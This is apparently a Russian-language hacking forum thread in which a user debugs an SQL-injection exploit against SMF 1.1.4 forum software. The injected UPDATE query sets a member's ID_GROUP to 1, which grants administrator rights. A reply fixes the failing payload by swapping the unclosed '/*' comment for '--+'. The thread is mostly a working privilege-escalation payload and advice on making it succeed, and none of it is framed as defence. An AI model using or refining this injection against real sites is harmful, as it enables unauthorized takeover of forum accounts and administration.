[MySQL] Ошибка синтаксиса в закомментированной фразе
Здравствуйте. Тестирую эксплоит для SMF 1.1.4 (SQL-inj) и при проведении инъекции получаю вот такой запрос.
Код:
UPDATE smf_members
SET
messageLabels = 'one',ID_GROUP=1 WHERE/*,*/ID_MEMBER=2/*'
WHERE ID_MEMBER = 2
LIMIT 1
По идее, нижний текст является закомментированным т.к. перед ним идёт /*. но MySQL выдаёт ошибку
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*'
WHERE ID_MEMBER = 2
LIMIT 1
в чём здесь проблема? Уже час не могу понять. Может дело в каких-нибудь настройках MySQL?
MySQL ругается на '/*', попробуй использовать другой комментарий в конце, например '--+', начиная с версии 5.0.51 комментарий '/*' нельзя оставлять открытым.
__________________ Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 26.09.2009 в 12:40..